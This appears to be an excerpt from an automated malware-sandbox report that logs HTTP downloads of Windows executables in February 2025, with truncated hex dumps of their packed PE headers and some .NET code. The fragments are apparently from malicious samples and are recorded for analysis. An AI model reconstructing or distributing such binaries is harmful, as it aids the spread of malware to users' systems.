00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 6a 00 00 04 00 00 77 21 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 63 68 6b 76 6d 6d 69 00 60 1a 00 00 f0 4f 00 00 52 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 64 66 6f 7a 66 6a 77 00 10 00 00 00 50 6a 00 00 04 00 00 00 d2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 6a 00 00 22 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:00:34 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Feb 2025 17:00:40 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Feb 2025 17:00:42 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:00:46 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:01:51 GMTContent-Type: application/octet-streamContent-Length: 6113792Last-Modified: Fri, 07 Feb 2025 16:26:45 GMTConnection: keep-aliveETag: "67a63445-5d4a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 c2 9a 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 68 51 00 00 92 4b 00 00 00 00 00 00 80 f7 00 00 10 00 00 00 a0 93 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 b0 f7 00 00 04 00 00 10 fd 5d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 40 a0 00 68 00 00 00 00 00 9e 00 68 3b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 a0 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 9d 00 00 10 00 00 00 22 3d 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 3b 02 00 00 00 9e 00 00 c8 01 00 00 32 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 a0 00 00 02 00 00 00 fa 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 38 00 00 50 a0 00 00 02 00 00 00 fc 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 7a 71 69 6d 61 76 73 00 30 1e 00 00 40 d9 00 00 26 1e 00 00 fe 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 64 78 6d 67 68 71 00 10 00 00 00 70 f7 00 00 04 00 00 00 24 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 f7 00 00 22 00 00 00 28 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:02:00 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 17:02:03 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 